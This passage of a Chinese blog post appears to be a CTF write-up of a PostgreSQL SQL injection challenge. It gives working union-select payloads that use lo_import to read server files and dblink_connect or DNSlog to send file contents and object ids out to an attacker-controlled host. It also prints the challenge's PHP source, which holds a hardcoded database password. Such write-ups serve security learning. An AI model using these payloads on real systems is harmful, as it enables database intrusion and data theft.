<p>这是原WP里的错误，原因在于其flag文件本身就已经包含在大对象里，所以直接就可查询，而dblink状态下并没有生效，算是这次比赛这道题目的最大收获吧。</p>
<p>如实验所示，流程如下，IP记得替换成自己的</p>
<p>首先起服务如实验中所示</p>
<p>先将<code>index.php</code>包含进来，看看有没有线索</p>
<pre class="language-none"><code class="language-none">?f&#x3D;gyy&#39; union select (SELECT lo_import(&#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php&#39;)),&#39;2&#39; --</code></pre>

<p>然后读取全部oid列表</p>
<pre class="language-none"><code class="language-none">?f&#x3D;gyy&#39; union select 1,(SELECT dblink_connect(&#39;host&#x3D;IP user&#x3D;@&#39; || (SELECT string_agg(cast(oid as text), &#39;,&#39;) FROM pg_largeobject_metadata) || &#39; password&#x3D;postgres dbname&#x3D;postgres&#39;)) --</code></pre>

<img src="/article/cqb2021/image-20210202011754628.png" class="" title="oid3" loading="lazy">

<p>（多按几下就会有多个oid，见谅…）</p>
<p>然后读<code>index.php</code>的oid读取数据，这里可以直接读，lo_get数据转码为UTF-8，然后替换换行符(chr(10))再替换空格(chr(32))即可明文读取</p>
<pre class="language-none"><code class="language-none">.&#x2F;?f&#x3D;gyy&#39; union select 1,(SELECT dblink_connect(&#39;host&#x3D;IP user&#x3D;@&#39; || (SELECT replace(replace(substring(convert_from(lo_get(16440),&#39;utf8&#39;),1,900),chr(10),&#39;&#39;),chr(32),&#39;&#39;)) || &#39; password&#x3D;postgres dbname&#x3D;postgres&#39;)) --</code></pre>

<img src="/article/cqb2021/image-20210202004121305.png" class="" title="index" loading="lazy">

<p>当然看不清可以base64读取自己转</p>
<pre class="language-none"><code class="language-none">.&#x2F;?f&#x3D;gyy&#39; union select 1,(SELECT dblink_connect(&#39;host&#x3D;IP user&#x3D;postgres password&#x3D;postgres dbname&#x3D;@&#39;||(SELECT replace(substring(encode(lo_get(16440),&#39;base64&#39;),1,900),chr(10),&#39;&#39;)))) --</code></pre>

<img src="/article/cqb2021/image-20210201200655345.png" class="" title="base64index" loading="lazy">

<p>得到<code>index.php</code>源码</p>
<pre class="language-none"><code class="language-none">&lt;?php

error_reporting(0);
session_start();

function is_mobile()&#123;
    if (isset ($_SERVER[&#39;HTTP_USER_AGENT&#39;])) &#123;
        $clientkeywords &#x3D; array(
            &#39;nokia&#39;,&#39;sony&#39;,&#39;ericsson&#39;,&#39;mot&#39;,&#39;samsung&#39;,&#39;htc&#39;,&#39;sgh&#39;,&#39;lg&#39;,&#39;sharp&#39;,&#39;sie-&#39;,&#39;philips&#39;,&#39;panasonic&#39;,&#39;alcatel&#39;,&#39;lenovo&#39;,&#39;iphone&#39;,&#39;ipod&#39;,&#39;blackberry&#39;,&#39;meizu&#39;,&#39;android&#39;,&#39;netfront&#39;,&#39;symbian&#39;,&#39;ucweb&#39;,&#39;windowsce&#39;,&#39;palm&#39;,&#39;operamini&#39;,&#39;operamobi&#39;,&#39;openwave&#39;,&#39;nexusone&#39;,&#39;cldc&#39;,&#39;midp&#39;,&#39;wap&#39;,&#39;mobile&#39;
        );
        if (preg_match(&quot;&#x2F;(&quot; . implode(&#39;|&#39;, $clientkeywords) . &quot;)&#x2F;i&quot;, strtolower($_SERVER[&#39;HTTP_USER_AGENT&#39;]))) &#123;
            return true;
        &#125;
    &#125;
    return false;
&#125;
if (!is_mobile()) &#123;
    die(&quot;&lt;!--function is_mobile()&#123;--&gt;
&lt;!--if (isset (\$_SERVER[&#39;HTTP_USER_AGENT&#39;])) &#123;--&gt;
&lt;!--\$clientkeywords &#x3D; array(--&gt;
&lt;!--&#39;nokia&#39;,&#39;sony&#39;,&#39;ericsson&#39;,&#39;mot&#39;,&#39;samsung&#39;,&#39;htc&#39;,&#39;sgh&#39;,&#39;lg&#39;,&#39;sharp&#39;,&#39;sie-&#39;,&#39;philips&#39;,&#39;panasonic&#39;,&#39;alcatel&#39;,&#39;lenovo&#39;,&#39;iphone&#39;,&#39;ipod&#39;,&#39;blackberry&#39;,&#39;meizu&#39;,&#39;android&#39;,&#39;netfront&#39;,&#39;symbian&#39;,&#39;ucweb&#39;,&#39;windowsce&#39;,&#39;palm&#39;,&#39;operamini&#39;,&#39;operamobi&#39;,&#39;openwave&#39;,&#39;nexusone&#39;,&#39;cldc&#39;,&#39;midp&#39;,&#39;wap&#39;,&#39;mobile&#39;--&gt;
&lt;!--);--&gt;
&lt;!--&#x2F;&#x2F;HTTP_USER_AGENT¸­--&gt;
&lt;!--if (preg_match(\&quot;&#x2F;(\&quot; . implode(&#39;|&#39;, \$clientkeywords) . \&quot;)&#x2F;i\&quot;, strtolower(\$_SERVER[&#39;HTTP_USER_AGENT&#39;]))) &#123;--&gt;
&lt;!--return true;--&gt;
&lt;!--&#125;--&gt;
&lt;!--&#125;--&gt;
&lt;!--return false;--&gt;
&lt;!--&#125;--&gt;&quot;);
&#125;

$user_input &#x3D; $_GET[&#39;f&#39;];

if ($_SESSION[&quot;sql_injection&quot;]) &#123;

    $user_input2 &#x3D; $_SESSION[&quot;sql_injection&quot;];

    if(preg_match(&quot;&#x2F;dblink&#x2F;i&quot;, $user_input2)) &#123;
        if(preg_match(&quot;&#x2F;host&#x2F;i&quot;, $user_input2)) &#123;
            $limit &#x3D; 1;
        &#125;
        $user_input2 &#x3D; preg_replace(&#39;&#x2F;(connect_timeout ?&#x3D;)&#x2F;i&#39;, &#39;&#39;, $user_input);
        $user_input2 &#x3D; preg_replace(&#39;&#x2F;(host&#x3D;)&#x2F;i&#39;, &#39;connect_timeout&#x3D;2 host&#x3D;&#39;, $user_input);
&#x2F;&#x2F;        hack for tcpdump ,only dns
        $user_input2 &#x3D; preg_replace(&#39;&#x2F;(user&#x3D;\&#39;)&#x2F;i&#39;, &#39;hack&#39;, $user_input2);
        $user_input2 &#x3D; preg_replace(&#39;&#x2F;(password&#x3D;\&#39;)&#x2F;i&#39;, &#39;hack&#39;, $user_input2);
    &#125;

    $dbconn &#x3D; pg_connect(&quot;host&#x3D;127.0.0.1 port&#x3D;5432 dbname&#x3D;docker_db user&#x3D;docker password&#x3D;aYRr45lTgN9I9LJcjcr0&quot;);
    pg_query($dbconn, &quot;SET statement_timeout TO 0&quot;);
    pg_query($dbconn, &quot;SET idle_in_transaction_session_timeout TO 20&quot;);
    pg_query($dbconn, &quot;SET lock_timeout TO 20&quot;);

    $sql &#x3D; &quot;SELECT * FROM searches WHERE search &#x3D; &#39;&quot;.$user_input2.&quot;&#39;&quot;;

    try &#123;
        if (pg_prepare($dbconn, &quot;my_query&quot;, $sql)) &#123;
            $start &#x3D; microtime(true);
            pg_send_query($dbconn, $sql);
            $error &#x3D; 0;
        &#125; else &#123;
            pg_send_query($dbconn, &quot;SELECT id FROM searches WHERE search &#x3D; &#39;0&#39;&quot;);
            $error &#x3D; 1;
        &#125;
    &#125; catch (Exception $e) &#123;
        &#x2F;&#x2F; Do nothing
    &#125;
&#125;

$_SESSION[&quot;sql_injection&quot;] &#x3D; $user_input;

?&gt;</code></pre>

<p>好像没啥，根据 <code>hint：不是所有sql都叫PostgreSQL；flag在web目录下的某个文件里。</code> 确定，关键文件肯定在这里，于是继续尝试，读到了<code>.hatccess</code>，包含一下，再读一下</p>
<p><code>.htaccess</code></p>
<pre class="language-none"><code class="language-none">&lt;FilesMatch &quot;pushF1n4AnK&quot;&gt;
  SetHandler application&#x2F;x-httpd-php
&lt;&#x2F;FilesMatch&gt;

AddType image&#x2F;jpeg .tank</code></pre>

<p>可疑文件<code>pushF1n4AnK</code>，读一下</p>
<img src="/article/cqb2021/image-20210201201204964.png" class="" title="flag" loading="lazy">

<p>至此题目结束了</p>
<p>最后说一下注入点的问题</p>
<h3 id="注入点"><a href="#注入点" class="headerlink" title="注入点"></a>注入点</h3><h4 id="DNSlog"><a href="#DNSlog" class="headerlink" title="DNSlog"></a>DNSlog</h4><p>对于DNSlog，注入点在host，即<code>... host=&#39;|| (query) ||&#39;.xxxx.ceye.io ...</code>，上面已解释过</p>
<h4 id="数据库外联"><a href="#数据库外联" class="headerlink" title="数据库外联"></a>数据库外联</h4><p>注入点在明文传输的部分，即<code>... user=&#39;|| (query) ||&#39;...</code>和<code>... dbname=&#39;||(query) &#39;</code>最后不需要<code>|</code>连接符，因为没有东西加了会报错</p>
<p>举例，例如在获取所有大对象oid时，在<code>user</code>处注，如图所示</p>
<img src="/article/cqb2021/image-20210202021430433.png" class="" title="inject" loading="lazy">

<pre class="language-none"><code class="language-none">user.xxxx.database.postgres</code></pre>

<p>即<code>user</code>和<code>dbname</code>处都是明文传输的都可以注，而password不行</p>
<h2 id="感谢"><a href="#感谢" class="headerlink" title="感谢"></a>感谢</h2><p>感谢 <a target="_blank" rel="noopener" href="https://ha1c9on.top/">@HA1C9ON</a> 大佬的教导，感谢 @egg 师傅的指导，以及和 @R1chm0nd 师傅赛后讨论指正payload中<code>user=&#39; || (query) || &#39;</code>的<code>|</code>或符合其实是连接符，学习了。</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a target="_blank" rel="noopener" href="https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md">https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/78908281?from_voters_page=true">https://zhuanlan.zhihu.com/p/78908281?from_voters_page=true</a></p>
<p><a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration">https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration</a></p>
<p><a target="_blank" rel="noopener" href="https://balsn.tw/ctf_writeup/20190603-facebookctf/">https://balsn.tw/ctf_writeup/20190603-facebookctf/</a></p>
<p><a target="_blank" rel="noopener" href="https://ha1c9on.top/2021/01/31/2021-cqb-write-up/">https://ha1c9on.top/2021/01/31/2021-cqb-write-up/</a> la佬博客，希望能和师傅一样强，能和师傅换友链</p>
<p><a target="_blank" rel="noopener" href="https://blog.pentesteracademy.com/postgresql-udf-command-execution-372f0c68cfed">https://blog.pentesteracademy.com/postgresql-udf-command-execution-372f0c68cfed</a> (写udf的，没用上2333)</p>
<p><a target="_blank" rel="noopener" href="http://www.postgres.cn/docs/9.4/functions-datetime.html#FUNCTIONS-DATETIME-DELAY">http://www.postgres.cn/docs/9.4/functions-datetime.html#FUNCTIONS-DATETIME-DELAY</a></p>
<p><a target="_blank" rel="noopener" href="https://www.postgresql.org/docs/11/dblink.html">https://www.postgresql.org/docs/11/dblink.html</a></p>
</div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>gyy</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://err0r.top/article/cqb2021/" title="春秋杯2021新春欢乐赛一道题——按F注入 对pgsql的研究">https://err0r.top/article/cqb2021/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/article/2021gongcesai/" rel="prev" title="CnHongKe2021公测赛"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">CnHongKe2021公测赛</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/article/djbctf2021/" rel="next" title="DJBCTF2021"><span class="post-nav-text">DJBCTF2021</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>若您想及时得到回复提醒，建议私发邮件联系。</span><br><span>评论请遵守评论公德，博主会不定时检查评论并进行回复。</span><br></div><div id="waline"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/@waline/client/dist/Waline.min.js", () => {
  const walineConfig = {"enable":true,"serverURL":"https://comments-err0rcm.vercel.app","comment":true,"visitor":false,"el":"#waline","lang":"zh-CN"}
  walineConfig.path = "/article/cqb2021/"
  new Waline(walineConfig)
}, window.Waline);</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">苏ICP备20028116号-1</a></div><div class="copyright"><span>&copy; 2020 – 2021 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> gyy</span></div><div class="live_time"><span>本博客已在各种灾难中运行了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2020-10-20T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#000000" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="想要搜些什么？" value=""></div><div id="local-search-result"></div></div><script>const date = new Date();
const today = (date.getMonth() + 1) + "-" + date.getDate()
const mourn_days = ["4-4","9-18","12-13"]
if (mourn_days.includes(today)) {
  document.documentElement.style.filter = "grayscale(1)";
}</script></div><!-- hexo-inject:begin --><!-- hexo-inject:end --></body></html>